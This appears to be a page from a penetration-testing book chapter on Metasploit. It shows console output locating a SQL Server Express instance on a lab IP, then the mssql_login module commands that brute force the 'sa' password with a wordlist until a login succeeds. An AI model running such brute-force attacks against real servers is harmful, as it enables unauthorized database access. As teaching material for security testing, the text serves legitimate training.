background image

78

Chapter 6

[*] SQL Server information for 192.168.33.130: 
[*]    ServerName      = IHAZSECURITY 
[*]    InstanceName    = SQLEXPRESS
[*]    IsClustered     = No
[*]    Version         = 9.00.1399.06 
[*]    tcp             = 1433 
[*]    np              = \\IHAZSECURITY\pipe\MSSQL$SQLEXPRESS\sql\query
[*] Scanned 129 of 256 hosts (050% complete)

After calling the 

mssql_ping

 module with 

use scanner/mssql/mssql_ping

 

and setting our options, we see that a SQL Server installation is found at 
192.168.33.130  . The name of the server is

 

IHAZSECURITY

  . Its version 

number 9.00.1399.06 shown at   equates to SQL Server 2005 Express, and 
we know that it’s listening on TCP port 1433  .

Brute Forcing MS SQL Server

Next, we brute force the server with the Framework’s 

mssql_login

 module:

msf > 

use scanner/mssql/mssql_login 

msf auxiliary(mssql_login) > 

show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        The password for the specified username
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             1433             yes       The target port
   THREADS           1                yes       The number of concurrent threads
   USERNAME          sa               no        The username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords

separated by space, one pair per line

   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mssql_login) > 

set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt 

PASS_FILE => /pentest/exploits/fasttrack/bin/dict/wordlist.txt
msf auxiliary(mssql_login) > 

set RHOSTS 192.168.33.130

RHOSTS => 192.168.33.130
msf auxiliary(mssql_login) > 

set THREADS 10

THREADS => 10
msf auxiliary(mssql_login) > 

set verbose false

verbose => false
msf auxiliary(mssql_login) > 

exploit

[+] 192.168.33.130:1433 - MSSQL - successful login 'sa' : 

'password123'

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed